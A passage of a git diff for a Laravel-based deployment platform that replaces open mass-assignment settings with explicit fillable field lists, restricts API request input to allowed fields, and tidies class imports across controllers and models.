+            $database = create_standalone_mysql($environment->id, $destination->uuid, $request->only($allowedFields));
             if ($instantDeploy) {
                 StartDatabase::dispatch($database);
             }
@@ -1921,7 +1921,7 @@ public function create_database(Request $request, NewDatabaseTypes $type)
                 }
                 $request->offsetSet('redis_conf', $redisConf);
             }
-            $database = create_standalone_redis($environment->id, $destination->uuid, $request->all());
+            $database = create_standalone_redis($environment->id, $destination->uuid, $request->only($allowedFields));
             if ($instantDeploy) {
                 StartDatabase::dispatch($database);
             }
@@ -1958,7 +1958,7 @@ public function create_database(Request $request, NewDatabaseTypes $type)
             }
 
             removeUnnecessaryFieldsFromRequest($request);
-            $database = create_standalone_dragonfly($environment->id, $destination->uuid, $request->all());
+            $database = create_standalone_dragonfly($environment->id, $destination->uuid, $request->only($allowedFields));
             if ($instantDeploy) {
                 StartDatabase::dispatch($database);
             }
@@ -2007,7 +2007,7 @@ public function create_database(Request $request, NewDatabaseTypes $type)
                 }
                 $request->offsetSet('keydb_conf', $keydbConf);
             }
-            $database = create_standalone_keydb($environment->id, $destination->uuid, $request->all());
+            $database = create_standalone_keydb($environment->id, $destination->uuid, $request->only($allowedFields));
             if ($instantDeploy) {
                 StartDatabase::dispatch($database);
             }
@@ -2043,7 +2043,7 @@ public function create_database(Request $request, NewDatabaseTypes $type)
                 ], 422);
             }
             removeUnnecessaryFieldsFromRequest($request);
-            $database = create_standalone_clickhouse($environment->id, $destination->uuid, $request->all());
+            $database = create_standalone_clickhouse($environment->id, $destination->uuid, $request->only($allowedFields));
             if ($instantDeploy) {
                 StartDatabase::dispatch($database);
             }
@@ -2101,7 +2101,7 @@ public function create_database(Request $request, NewDatabaseTypes $type)
                 }
                 $request->offsetSet('mongo_conf', $mongoConf);
             }
-            $database = create_standalone_mongodb($environment->id, $destination->uuid, $request->all());
+            $database = create_standalone_mongodb($environment->id, $destination->uuid, $request->only($allowedFields));
             if ($instantDeploy) {
                 StartDatabase::dispatch($database);
             }
diff --git a/app/Http/Controllers/Api/SecurityController.php b/app/Http/Controllers/Api/SecurityController.php
index e7b36cb9a..2c62928c2 100644
--- a/app/Http/Controllers/Api/SecurityController.php
+++ b/app/Http/Controllers/Api/SecurityController.php
@@ -4,6 +4,7 @@
 
 use App\Http\Controllers\Controller;
 use App\Models\PrivateKey;
+use Illuminate\Http\JsonResponse;
 use Illuminate\Http\Request;
 use OpenApi\Attributes as OA;
 
@@ -176,7 +177,7 @@ public function create_key(Request $request)
             return invalidTokenResponse();
         }
         $return = validateIncomingRequest($request);
-        if ($return instanceof \Illuminate\Http\JsonResponse) {
+        if ($return instanceof JsonResponse) {
             return $return;
         }
         $validator = customApiValidator($request->all(), [
@@ -300,7 +301,7 @@ public function update_key(Request $request)
             return invalidTokenResponse();
         }
         $return = validateIncomingRequest($request);
-        if ($return instanceof \Illuminate\Http\JsonResponse) {
+        if ($return instanceof JsonResponse) {
             return $return;
         }
 
@@ -330,7 +331,7 @@ public function update_key(Request $request)
                 'message' => 'Private Key not found.',
             ], 404);
         }
-        $foundKey->update($request->all());
+        $foundKey->update($request->only($allowedFields));
 
         return response()->json(serializeApiResponse([
             'uuid' => $foundKey->uuid,
diff --git a/app/Livewire/Project/CloneMe.php b/app/Livewire/Project/CloneMe.php
index e9184a154..013e66901 100644
--- a/app/Livewire/Project/CloneMe.php
+++ b/app/Livewire/Project/CloneMe.php
@@ -139,7 +139,7 @@ public function clone(string $type)
                     'id',
                     'created_at',
                     'updated_at',
-                ])->fill([
+                ])->forceFill([
                     'uuid' => $uuid,
                     'status' => 'exited',
                     'started_at' => null,
@@ -187,7 +187,7 @@ public function clone(string $type)
                         'id',
                         'created_at',
                         'updated_at',
-                    ])->fill([
+                    ])->forceFill([
                         'name' => $newName,
                         'resource_id' => $newDatabase->id,
                     ]);
@@ -216,7 +216,7 @@ public function clone(string $type)
                         'id',
                         'created_at',
                         'updated_at',
-                    ])->fill([
+                    ])->forceFill([
                         'resource_id' => $newDatabase->id,
                     ]);
                     $newStorage->save();
@@ -229,7 +229,7 @@ public function clone(string $type)
                         'id',
                         'created_at',
                         'updated_at',
-                    ])->fill([
+                    ])->forceFill([
                         'uuid' => $uuid,
                         'database_id' => $newDatabase->id,
                         'database_type' => $newDatabase->getMorphClass(),
@@ -247,7 +247,7 @@ public function clone(string $type)
                         'id',
                         'created_at',
                         'updated_at',
-                    ])->fill($payload);
+                    ])->forceFill($payload);
                     $newEnvironmentVariable->save();
                 }
             }
@@ -258,7 +258,7 @@ public function clone(string $type)
                     'id',
                     'created_at',
                     'updated_at',
-                ])->fill([
+                ])->forceFill([
                     'uuid' => $uuid,
                     'environment_id' => $environment->id,
                     'destination_id' => $this->selectedDestination,
@@ -276,7 +276,7 @@ public function clone(string $type)
                         'id',
                         'created_at',
                         'updated_at',
-                    ])->fill([
+                    ])->forceFill([
                         'uuid' => (string) new Cuid2,
                         'service_id' => $newService->id,
                         'team_id' => currentTeam()->id,
@@ -290,7 +290,7 @@ public function clone(string $type)
                         'id',
                         'created_at',
                         'updated_at',
-                    ])->fill([
+                    ])->forceFill([
                         'resourceable_id' => $newService->id,
                         'resourceable_type' => $newService->getMorphClass(),
                     ]);
@@ -298,9 +298,9 @@ public function clone(string $type)
                 }
 
                 foreach ($newService->applications() as $application) {
-                    $application->update([
+                    $application->forceFill([
                         'status' => 'exited',
-                    ]);
+                    ])->save();
 
                     $persistentVolumes = $application->persistentStorages()->get();
                     foreach ($persistentVolumes as $volume) {
@@ -315,7 +315,7 @@ public function clone(string $type)
                             'id',
                             'created_at',
                             'updated_at',
-                        ])->fill([
+                        ])->forceFill([
                             'name' => $newName,
                             'resource_id' => $application->id,
                         ]);
@@ -344,7 +344,7 @@ public function clone(string $type)
                             'id',
                             'created_at',
                             'updated_at',
-                        ])->fill([
+                        ])->forceFill([
                             'resource_id' => $application->id,
                         ]);
                         $newStorage->save();
@@ -352,9 +352,9 @@ public function clone(string $type)
                 }
 
                 foreach ($newService->databases() as $database) {
-                    $database->update([
+                    $database->forceFill([
                         'status' => 'exited',
-                    ]);
+                    ])->save();
 
                     $persistentVolumes = $database->persistentStorages()->get();
                     foreach ($persistentVolumes as $volume) {
@@ -369,7 +369,7 @@ public function clone(string $type)
                             'id',
                             'created_at',
                             'updated_at',
-                        ])->fill([
+                        ])->forceFill([
                             'name' => $newName,
                             'resource_id' => $database->id,
                         ]);
@@ -398,7 +398,7 @@ public function clone(string $type)
                             'id',
                             'created_at',
                             'updated_at',
-                        ])->fill([
+                        ])->forceFill([
                             'resource_id' => $database->id,
                         ]);
                         $newStorage->save();
@@ -411,7 +411,7 @@ public function clone(string $type)
                             'id',
                             'created_at',
                             'updated_at',
-                        ])->fill([
+                        ])->forceFill([
                             'uuid' => $uuid,
                             'database_id' => $database->id,
                             'database_type' => $database->getMorphClass(),
diff --git a/app/Livewire/Project/Shared/ResourceOperations.php b/app/Livewire/Project/Shared/ResourceOperations.php
index e769e4bcb..a26b43026 100644
--- a/app/Livewire/Project/Shared/ResourceOperations.php
+++ b/app/Livewire/Project/Shared/ResourceOperations.php
@@ -7,9 +7,18 @@
 use App\Actions\Service\StartService;
 use App\Actions\Service\StopService;
 use App\Jobs\VolumeCloneJob;
+use App\Models\Application;
 use App\Models\Environment;
 use App\Models\Project;
+use App\Models\StandaloneClickhouse;
 use App\Models\StandaloneDocker;
+use App\Models\StandaloneDragonfly;
+use App\Models\StandaloneKeydb;
+use App\Models\StandaloneMariadb;
+use App\Models\StandaloneMongodb;
+use App\Models\StandaloneMysql;
+use App\Models\StandalonePostgresql;
+use App\Models\StandaloneRedis;
 use App\Models\SwarmDocker;
 use Illuminate\Foundation\Auth\Access\AuthorizesRequests;
 use Livewire\Component;
@@ -60,7 +69,7 @@ public function cloneTo($destination_id)
         $uuid = (string) new Cuid2;
         $server = $new_destination->server;
 
-        if ($this->resource->getMorphClass() === \App\Models\Application::class) {
+        if ($this->resource->getMorphClass() === Application::class) {
             $new_resource = clone_application($this->resource, $new_destination, ['uuid' => $uuid], $this->cloneVolumeData);
 
             $route = route('project.application.configuration', [
@@ -71,21 +80,21 @@ public function cloneTo($destination_id)
 
             return redirect()->to($route);
         } elseif (
-            $this->resource->getMorphClass() === \App\Models\StandalonePostgresql::class ||
-            $this->resource->getMorphClass() === \App\Models\StandaloneMongodb::class ||
-            $this->resource->getMorphClass() === \App\Models\StandaloneMysql::class ||
-            $this->resource->getMorphClass() === \App\Models\StandaloneMariadb::class ||
-            $this->resource->getMorphClass() === \App\Models\StandaloneRedis::class ||
-            $this->resource->getMorphClass() === \App\Models\StandaloneKeydb::class ||
-            $this->resource->getMorphClass() === \App\Models\StandaloneDragonfly::class ||
-            $this->resource->getMorphClass() === \App\Models\StandaloneClickhouse::class
+            $this->resource->getMorphClass() === StandalonePostgresql::class ||
+            $this->resource->getMorphClass() === StandaloneMongodb::class ||
+            $this->resource->getMorphClass() === StandaloneMysql::class ||
+            $this->resource->getMorphClass() === StandaloneMariadb::class ||
+            $this->resource->getMorphClass() === StandaloneRedis::class ||
+            $this->resource->getMorphClass() === StandaloneKeydb::class ||
+            $this->resource->getMorphClass() === StandaloneDragonfly::class ||
+            $this->resource->getMorphClass() === StandaloneClickhouse::class
         ) {
             $uuid = (string) new Cuid2;
             $new_resource = $this->resource->replicate([
                 'id',
                 'created_at',
                 'updated_at',
-            ])->fill([
+            ])->forceFill([
                 'uuid' => $uuid,
                 'name' => $this->resource->name.'-clone-'.$uuid,
                 'status' => 'exited',
@@ -133,7 +142,7 @@ public function cloneTo($destination_id)
                     'id',
                     'created_at',
                     'updated_at',
-                ])->fill([
+                ])->forceFill([
                     'name' => $newName,
                     'resource_id' => $new_resource->id,
                 ]);
@@ -162,7 +171,7 @@ public function cloneTo($destination_id)
                     'id',
                     'created_at',
                     'updated_at',
-                ])->fill([
+                ])->forceFill([
                     'resource_id' => $new_resource->id,
                 ]);
                 $newStorage->save();
@@ -175,7 +184,7 @@ public function cloneTo($destination_id)
                     'id',
                     'created_at',
                     'updated_at',
-                ])->fill([
+                ])->forceFill([
                     'uuid' => $uuid,
                     'database_id' => $new_resource->id,
                     'database_type' => $new_resource->getMorphClass(),
@@ -194,7 +203,7 @@ public function cloneTo($destination_id)
                     'id',
                     'created_at',
                     'updated_at',
-                ])->fill($payload);
+                ])->forceFill($payload);
                 $newEnvironmentVariable->save();
             }
 
@@ -211,7 +220,7 @@ public function cloneTo($destination_id)
                 'id',
                 'created_at',
                 'updated_at',
-            ])->fill([
+            ])->forceFill([
                 'uuid' => $uuid,
                 'name' => $this->resource->name.'-clone-'.$uuid,
                 'destination_id' => $new_destination->id,
@@ -232,7 +241,7 @@ public function cloneTo($destination_id)
                     'id',
                     'created_at',
                     'updated_at',
-                ])->fill([
+                ])->forceFill([
                     'uuid' => (string) new Cuid2,
                     'service_id' => $new_resource->id,
                     'team_id' => currentTeam()->id,
@@ -246,7 +255,7 @@ public function cloneTo($destination_id)
                     'id',
                     'created_at',
                     'updated_at',
-                ])->fill([
+                ])->forceFill([
                     'resourceable_id' => $new_resource->id,
                     'resourceable_type' => $new_resource->getMorphClass(),
                 ]);
@@ -254,9 +263,9 @@ public function cloneTo($destination_id)
             }
 
             foreach ($new_resource->applications() as $application) {
-                $application->update([
+                $application->forceFill([
                     'status' => 'exited',
-                ]);
+                ])->save();
 
                 $persistentVolumes = $application->persistentStorages()->get();
                 foreach ($persistentVolumes as $volume) {
@@ -271,7 +280,7 @@ public function cloneTo($destination_id)
                         'id',
                         'created_at',
                         'updated_at',
-                    ])->fill([
+                    ])->forceFill([
                         'name' => $newName,
                         'resource_id' => $application->id,
                     ]);
@@ -296,9 +305,9 @@ public function cloneTo($destination_id)
             }
 
             foreach ($new_resource->databases() as $database) {
-                $database->update([
+                $database->forceFill([
                     'status' => 'exited',
-                ]);
+                ])->save();
 
                 $persistentVolumes = $database->persistentStorages()->get();
                 foreach ($persistentVolumes as $volume) {
@@ -313,7 +322,7 @@ public function cloneTo($destination_id)
                         'id',
                         'created_at',
                         'updated_at',
-                    ])->fill([
+                    ])->forceFill([
                         'name' => $newName,
                         'resource_id' => $database->id,
                     ]);
@@ -354,9 +363,9 @@ public function moveTo($environment_id)
         try {
             $this->authorize('update', $this->resource);
             $new_environment = Environment::ownedByCurrentTeam()->findOrFail($environment_id);
-            $this->resource->update([
+            $this->resource->forceFill([
                 'environment_id' => $environment_id,
-            ]);
+            ])->save();
             if ($this->resource->type() === 'application') {
                 $route = route('project.application.configuration', [
                     'project_uuid' => $new_environment->project->uuid,
diff --git a/app/Models/Application.php b/app/Models/Application.php
index c446052b3..4ed1252e4 100644
--- a/app/Models/Application.php
+++ b/app/Models/Application.php
@@ -118,7 +118,91 @@ class Application extends BaseModel
 
     private static $parserVersion = '5';
 
-    protected $guarded = [];
+    protected $fillable = [
+        'name',
+        'description',
+        'fqdn',
+        'git_repository',
+        'git_branch',
+        'git_commit_sha',
+        'git_full_url',
+        'docker_registry_image_name',
+        'docker_registry_image_tag',
+        'build_pack',
+        'static_image',
+        'install_command',
+        'build_command',
+        'start_command',
+        'ports_exposes',
+        'ports_mappings',
+        'base_directory',
+        'publish_directory',
+        'health_check_enabled',
+        'health_check_path',
+        'health_check_port',
+        'health_check_host',
+        'health_check_method',
+        'health_check_return_code',
+        'health_check_scheme',
+        'health_check_response_text',
+        'health_check_interval',
+        'health_check_timeout',
+        'health_check_retries',
+        'health_check_start_period',
+        'health_check_type',
+        'health_check_command',
+        'limits_memory',
+        'limits_memory_swap',
+        'limits_memory_swappiness',
+        'limits_memory_reservation',
+        'limits_cpus',
+        'limits_cpuset',
+        'limits_cpu_shares',
+        'status',
+        'preview_url_template',
+        'dockerfile',
+        'dockerfile_location',
+        'dockerfile_target_build',
+        'custom_labels',
+        'custom_docker_run_options',
+        'post_deployment_command',
+        'post_deployment_command_container',
+        'pre_deployment_command',
+        'pre_deployment_command_container',
+        'manual_webhook_secret_github',
+        'manual_webhook_secret_gitlab',
+        'manual_webhook_secret_bitbucket',
+        'manual_webhook_secret_gitea',
+        'docker_compose_location',
+        'docker_compose',
+        'docker_compose_raw',
+        'docker_compose_domains',
+        'docker_compose_custom_start_command',
+        'docker_compose_custom_build_command',
+        'swarm_replicas',
+        'swarm_placement_constraints',
+        'watch_paths',
+        'redirect',
+        'compose_parsing_version',
+        'custom_nginx_configuration',
+        'custom_network_aliases',
+        'custom_healthcheck_found',
+        'is_http_basic_auth_enabled',
+        'http_basic_auth_username',
+        'http_basic_auth_password',
+        'config_hash',
+        'last_online_at',
+        'restart_count',
+        'last_restart_at',
+        'last_restart_type',
+        'environment_id',
+        'destination_id',
+        'destination_type',
+        'source_id',
+        'source_type',
+        'private_key_id',
+        'repository_project_id',
+    ];
 
     protected $appends = ['server_status'];
 
@@ -1145,7 +1229,7 @@ public function getGitRemoteStatus(string $deployment_uuid)
                 'is_accessible' => true,
                 'error' => null,
             ];
-        } catch (\RuntimeException $ex) {
+        } catch (RuntimeException $ex) {
             return [
                 'is_accessible' => false,
                 'error' => $ex->getMessage(),
@@ -1202,7 +1286,7 @@ public function generateGitLsRemoteCommands(string $deployment_uuid, bool $exec_
                 ];
             }
 
-            if ($this->source->getMorphClass() === \App\Models\GitlabApp::class) {
+            if ($this->source->getMorphClass() === GitlabApp::class) {
                 $gitlabSource = $this->source;
                 $private_key = data_get($gitlabSource, 'privateKey.private_key');
 
@@ -1354,7 +1438,7 @@ public function generateGitImportCommands(string $deployment_uuid, int $pull_req
             $source_html_url_host = $url['host'];
             $source_html_url_scheme = $url['scheme'];
 
-            if ($this->source->getMorphClass() === \App\Models\GithubApp::class) {
+            if ($this->source->getMorphClass() === GithubApp::class) {
                 if ($this->source->is_public) {
                     $fullRepoUrl = "{$this->source->html_url}/{$customRepository}";
                     $escapedRepoUrl = escapeshellarg("{$this->source->html_url}/{$customRepository}");
@@ -1409,7 +1493,7 @@ public function generateGitImportCommands(string $deployment_uuid, int $pull_req
                 ];
             }
 
-            if ($this->source->getMorphClass() === \App\Models\GitlabApp::class) {
+            if ($this->source->getMorphClass() === GitlabApp::class) {
                 $gitlabSource = $this->source;
                 $private_key = data_get($gitlabSource, 'privateKey.private_key');
 
@@ -1600,7 +1684,7 @@ public function oldRawParser()
         try {
             $yaml = Yaml::parse($this->docker_compose_raw);
         } catch (\Exception $e) {
-            throw new \RuntimeException($e->getMessage());
+            throw new RuntimeException($e->getMessage());
         }
         $services = data_get($yaml, 'services');
 
@@ -1682,7 +1766,7 @@ public function loadComposeFile($isInit = false, ?string $restoreBaseDirectory =
         $fileList = collect([".$workdir$composeFile"]);
         $gitRemoteStatus = $this->getGitRemoteStatus(deployment_uuid: $uuid);
         if (! $gitRemoteStatus['is_accessible']) {
-            throw new \RuntimeException("Failed to read Git source:\n\n{$gitRemoteStatus['error']}");
+            throw new RuntimeException("Failed to read Git source:\n\n{$gitRemoteStatus['error']}");
         }
         $getGitVersion = instant_remote_process(['git --version'], $this->destination->server, false);
         $gitVersion = str($getGitVersion)->explode(' ')->last();
@@ -1732,15 +1816,15 @@ public function loadComposeFile($isInit = false, ?string $restoreBaseDirectory =
             $this->save();
 
             if (str($e->getMessage())->contains('No such file')) {
-                throw new \RuntimeException("Docker Compose file not found at: $workdir$composeFile (branch: {$this->git_branch})<br><br>Check if you used the right extension (.yaml or .yml) in the compose file name.");
+                throw new RuntimeException("Docker Compose file not found at: $workdir$composeFile (branch: {$this->git_branch})<br><br>Check if you used the right extension (.yaml or .yml) in the compose file name.");
             }
             if (str($e->getMessage())->contains('fatal: repository') && str($e->getMessage())->contains('does not exist')) {
                 if ($this->deploymentType() === 'deploy_key') {
-                    throw new \RuntimeException('Your deploy key does not have access to the repository. Please check your deploy key and try again.');
+                    throw new RuntimeException('Your deploy key does not have access to the repository. Please check your deploy key and try again.');
                 }
-                throw new \RuntimeException('Repository does not exist. Please check your repository URL and try again.');
+                throw new RuntimeException('Repository does not exist. Please check your repository URL and try again.');
             }
-            throw new \RuntimeException($e->getMessage());
+            throw new RuntimeException($e->getMessage());
         } finally {
             // Cleanup only - restoration happens in catch block
             $commands = collect([
@@ -1793,7 +1877,7 @@ public function loadComposeFile($isInit = false, ?string $restoreBaseDirectory =
             $this->base_directory = $initialBaseDirectory;
             $this->save();
 
-            throw new \RuntimeException("Docker Compose file not found at: $workdir$composeFile (branch: {$this->git_branch})<br><br>Check if you used the right extension (.yaml or .yml) in the compose file name.");
+            throw new RuntimeException("Docker Compose file not found at: $workdir$composeFile (branch: {$this->git_branch})<br><br>Check if you used the right extension (.yaml or .yml) in the compose file name.");
         }
     }
 
diff --git a/app/Models/ApplicationDeploymentQueue.php b/app/Models/ApplicationDeploymentQueue.php
index 34257e7a7..3b33b1b67 100644
--- a/app/Models/ApplicationDeploymentQueue.php
+++ b/app/Models/ApplicationDeploymentQueue.php
@@ -39,7 +39,32 @@
 )]
 class ApplicationDeploymentQueue extends Model
 {
-    protected $guarded = [];
+    protected $fillable = [
+        'application_id',
+        'deployment_uuid',
+        'pull_request_id',
+        'force_rebuild',
+        'commit',
+        'status',
+        'is_webhook',
+        'logs',
+        'current_process_id',
+        'restart_only',
+        'git_type',
+        'server_id',
+        'application_name',
+        'server_name',
+        'deployment_url',
+        'destination_id',
+        'only_this_server',
+        'rollback',
+        'commit_message',
+        'is_api',
+        'build_server_id',
+        'horizon_job_id',
+        'horizon_job_worker',
+        'finished_at',
+    ];
 
     protected $casts = [
         'finished_at' => 'datetime',
diff --git a/app/Models/ApplicationPreview.php b/app/Models/ApplicationPreview.php
index b8a8a5a85..8dd6da074 100644
--- a/app/Models/ApplicationPreview.php
+++ b/app/Models/ApplicationPreview.php
@@ -10,7 +10,16 @@ class ApplicationPreview extends BaseModel
 {
     use SoftDeletes;
 
-    protected $guarded = [];
+    protected $fillable = [
+        'pull_request_id',
+        'pull_request_html_url',
+        'pull_request_issue_comment_id',
+        'fqdn',
+        'status',
+        'git_type',
+        'docker_compose_domains',
+        'last_online_at',
+    ];
 
     protected static function booted()
     {
@@ -69,7 +78,7 @@ public function application()
 
     public function persistentStorages()
     {
-        return $this->morphMany(\App\Models\LocalPersistentVolume::class, 'resource');
+        return $this->morphMany(LocalPersistentVolume::class, 'resource');
     }
 
     public function generate_preview_fqdn()
diff --git a/app/Models/ApplicationSetting.php b/app/Models/ApplicationSetting.php
index f40977b3e..24b35df7f 100644
--- a/app/Models/ApplicationSetting.php
+++ b/app/Models/ApplicationSetting.php
@@ -28,7 +28,42 @@ class ApplicationSetting extends Model
         'docker_images_to_keep' => 'integer',
     ];
 
-    protected $guarded = [];
+    protected $fillable = [
+        'is_static',
+        'is_git_submodules_enabled',
+        'is_git_lfs_enabled',
+        'is_auto_deploy_enabled',
+        'is_force_https_enabled',
+        'is_debug_enabled',
+        'is_preview_deployments_enabled',
+        'is_log_drain_enabled',
+        'is_gpu_enabled',
+        'gpu_driver',
+        'gpu_count',
+        'gpu_device_ids',
+        'gpu_options',
+        'is_include_timestamps',
+        'is_swarm_only_worker_nodes',
+        'is_raw_compose_deployment_enabled',
+        'is_build_server_enabled',
+        'is_consistent_container_name_enabled',
+        'is_gzip_enabled',
+        'is_stripprefix_enabled',
+        'connect_to_docker_network',
+        'custom_internal_name',
+        'is_container_label_escape_enabled',
+        'is_env_sorting_enabled',
+        'is_container_label_readonly_enabled',
+        'is_preserve_repository_enabled',
+        'disable_build_cache',
+        'is_spa',
+        'is_git_shallow_clone_enabled',
+        'is_pr_deployments_public_enabled',
+        'use_build_secrets',
+        'inject_build_args_to_dockerfile',
+        'include_source_commit_in_build',
+        'docker_images_to_keep',
+    ];
 
     public function isStatic(): Attribute
     {
diff --git a/app/Models/CloudProviderToken.php b/app/Models/CloudProviderToken.php
index 700ab0992..123376c9b 100644
--- a/app/Models/CloudProviderToken.php
+++ b/app/Models/CloudProviderToken.php
@@ -4,7 +4,11 @@
 
 class CloudProviderToken extends BaseModel
 {
-    protected $guarded = [];
+    protected $fillable = [
+        'provider',
+        'token',
+        'name',
+    ];
 
     protected $casts = [
         'token' => 'encrypted',
diff --git a/app/Models/DiscordNotificationSettings.php b/app/Models/DiscordNotificationSettings.php
index 23e1f0f12..e86598126 100644
--- a/app/Models/DiscordNotificationSettings.php
+++ b/app/Models/DiscordNotificationSettings.php
@@ -24,7 +24,8 @@ class DiscordNotificationSettings extends Model
         'backup_failure_discord_notifications',
         'scheduled_task_success_discord_notifications',
         'scheduled_task_failure_discord_notifications',
-        'docker_cleanup_discord_notifications',
+        'docker_cleanup_success_discord_notifications',
+        'docker_cleanup_failure_discord_notifications',
         'server_disk_usage_discord_notifications',
         'server_reachable_discord_notifications',
         'server_unreachable_discord_notifications',
diff --git a/app/Models/DockerCleanupExecution.php b/app/Models/DockerCleanupExecution.php
index 405037e30..162913b3e 100644
--- a/app/Models/DockerCleanupExecution.php
+++ b/app/Models/DockerCleanupExecution.php
@@ -6,7 +6,12 @@
 
 class DockerCleanupExecution extends BaseModel
 {
-    protected $guarded = [];
+    protected $fillable = [
+        'status',
+        'message',
+        'cleanup_log',
+        'finished_at',
+    ];
 
     public function server(): BelongsTo
     {
diff --git a/app/Models/EmailNotificationSettings.php b/app/Models/EmailNotificationSettings.php
index ee31a49b6..1277e45d9 100644
--- a/app/Models/EmailNotificationSettings.php
+++ b/app/Models/EmailNotificationSettings.php
@@ -34,7 +34,11 @@ class EmailNotificationSettings extends Model
         'backup_failure_email_notifications',
         'scheduled_task_success_email_notifications',
         'scheduled_task_failure_email_notifications',
+        'docker_cleanup_success_email_notifications',
+        'docker_cleanup_failure_email_notifications',
         'server_disk_usage_email_notifications',
+        'server_reachable_email_notifications',
+        'server_unreachable_email_notifications',
         'server_patch_email_notifications',
         'traefik_outdated_email_notifications',
     ];
diff --git a/app/Models/Environment.php b/app/Models/Environment.php
index d4e614e6e..55ce93265 100644
--- a/app/Models/Environment.php
+++ b/app/Models/Environment.php
@@ -25,7 +25,10 @@ class Environment extends BaseModel
     use HasFactory;
     use HasSafeStringAttribute;
 
-    protected $guarded = [];
+    protected $fillable = [
+        'name',
+        'description',
+    ];
 
     protected static function booted()
     {
diff --git a/app/Models/GithubApp.php b/app/Models/GithubApp.php
index ab82c9a9c..3cffeb8f8 100644
--- a/app/Models/GithubApp.php
+++ b/app/Models/GithubApp.php
@@ -6,7 +6,25 @@
 
 class GithubApp extends BaseModel
 {
-    protected $guarded = [];
+    protected $fillable = [
+        'name',
+        'organization',
+        'api_url',
+        'html_url',
+        'custom_user',
+        'custom_port',
+        'app_id',
+        'installation_id',
+        'client_id',
+        'client_secret',
+        'webhook_secret',
+        'is_system_wide',
+        'is_public',
+        'contents',
+        'metadata',
+        'pull_requests',
+        'administration',
+    ];
 
     protected $appends = ['type'];
 
@@ -92,7 +110,7 @@ public function type(): Attribute
     {
         return Attribute::make(
             get: function () {
-                if ($this->getMorphClass() === \App\Models\GithubApp::class) {
+                if ($this->getMorphClass() === GithubApp::class) {
                     return 'github';
                 }
             },
diff --git a/app/Models/GitlabApp.php b/app/Models/GitlabApp.php
index 2112a4a66..06df8fd8d 100644
--- a/app/Models/GitlabApp.php
+++ b/app/Models/GitlabApp.php
@@ -4,6 +4,24 @@
 
 class GitlabApp extends BaseModel
 {
+    protected $fillable = [
+        'name',
+        'organization',
+        'api_url',
+        'html_url',
+        'custom_port',
+        'custom_user',
+        'is_system_wide',
+        'is_public',
+        'app_id',
+        'app_secret',
+        'oauth_id',
+        'group_name',
+        'public_key',
+        'webhook_token',
+        'deploy_key_id',
+    ];
+
     protected $hidden = [
         'webhook_token',
         'app_secret',
diff --git a/app/Models/InstanceSettings.php b/app/Models/InstanceSettings.php
index ccc361d67..6061bc863 100644
--- a/app/Models/InstanceSettings.php
+++ b/app/Models/InstanceSettings.php
@@ -9,7 +9,43 @@
 
 class InstanceSettings extends Model
 {
-    protected $guarded = [];
+    protected $fillable = [
+        'public_ipv4',
+        'public_ipv6',
+        'fqdn',
+        'public_port_min',
+        'public_port_max',
+        'do_not_track',
+        'is_auto_update_enabled',
+        'is_registration_enabled',
+        'next_channel',
+        'smtp_enabled',
+        'smtp_from_address',
+        'smtp_from_name',
+        'smtp_recipients',
+        'smtp_host',
+        'smtp_port',
+        'smtp_encryption',
+        'smtp_username',
+        'smtp_password',
+        'smtp_timeout',
+        'resend_enabled',
+        'resend_api_key',
+        'is_dns_validation_enabled',
+        'custom_dns_servers',
+        'instance_name',
+        'is_api_enabled',
+        'allowed_ips',
+        'auto_update_frequency',
+        'update_check_frequency',
+        'new_version_available',
+        'instance_timezone',
+        'helper_version',
+        'disable_two_step_confirmation',
+        'is_sponsorship_popup_enabled',
+        'dev_helper_version',
+        'is_wire_navigate_enabled',
+    ];
 
     protected $casts = [
         'smtp_enabled' => 'boolean',
diff --git a/app/Models/LocalFileVolume.php b/app/Models/LocalFileVolume.php
index b954a1dd5..4b5c602c2 100644
--- a/app/Models/LocalFileVolume.php
+++ b/app/Models/LocalFileVolume.php
@@ -20,7 +20,18 @@ class LocalFileVolume extends BaseModel
 
     use HasFactory;
 
-    protected $guarded = [];
+    protected $fillable = [
+        'fs_path',
+        'mount_path',
+        'content',
+        'resource_type',
+        'resource_id',
+        'is_directory',
+        'chown',
+        'chmod',
+        'is_based_on_git',
+        'is_preview_suffix_enabled',
+    ];
 
     public $appends = ['is_binary'];
 
diff --git a/app/Models/LocalPersistentVolume.php b/app/Models/LocalPersistentVolume.php
index 9d539f8ec..2f0f482b0 100644
--- a/app/Models/LocalPersistentVolume.php
+++ b/app/Models/LocalPersistentVolume.php
@@ -7,7 +7,15 @@
 
 class LocalPersistentVolume extends BaseModel
 {
-    protected $guarded = [];
+    protected $fillable = [
+        'name',
+        'mount_path',
+        'host_path',
+        'container_id',
+        'resource_type',
+        'resource_id',
+        'is_preview_suffix_enabled',
+    ];
 
     protected $casts = [
         'is_preview_suffix_enabled' => 'boolean',
diff --git a/app/Models/Project.php b/app/Models/Project.php
index ed1b415c1..eca5440ef 100644
--- a/app/Models/Project.php
+++ b/app/Models/Project.php
@@ -24,7 +24,10 @@ class Project extends BaseModel
     use HasFactory;
     use HasSafeStringAttribute;
 
-    protected $guarded = [];
+    protected $fillable = [
+        'name',
+        'description',
+    ];
 
     /**
      * Get query builder for projects owned by current team.
diff --git a/app/Models/ProjectSetting.php b/app/Models/ProjectSetting.php
index d93bea05b..7ea17ba7a 100644
--- a/app/Models/ProjectSetting.php
+++ b/app/Models/ProjectSetting.php
@@ -6,7 +6,7 @@
 
 class ProjectSetting extends Model
 {
-    protected $guarded = [];
+    protected $fillable = [];
 
     public function project()
     {
diff --git a/app/Models/PushoverNotificationSettings.php b/app/Models/PushoverNotificationSettings.php
index 189d05dd4..5ad617ad6 100644
--- a/app/Models/PushoverNotificationSettings.php
+++ b/app/Models/PushoverNotificationSettings.php
@@ -25,7 +25,8 @@ class PushoverNotificationSettings extends Model
         'backup_failure_pushover_notifications',
         'scheduled_task_success_pushover_notifications',
         'scheduled_task_failure_pushover_notifications',
-        'docker_cleanup_pushover_notifications',
+        'docker_cleanup_success_pushover_notifications',
+        'docker_cleanup_failure_pushover_notifications',
         'server_disk_usage_pushover_notifications',
         'server_reachable_pushover_notifications',
         'server_unreachable_pushover_notifications',
diff --git a/app/Models/S3Storage.php b/app/Models/S3Storage.php
index f395a065c..d6feccc7e 100644
--- a/app/Models/S3Storage.php
+++ b/app/Models/S3Storage.php
@@ -12,7 +12,17 @@ class S3Storage extends BaseModel
 {
     use HasFactory, HasSafeStringAttribute;
 
-    protected $guarded = [];
+    protected $fillable = [
+        'name',
+        'description',
+        'region',
+        'key',
+        'secret',
+        'bucket',
+        'endpoint',
+        'is_usable',
+        'unusable_email_sent',
+    ];
 
     protected $casts = [
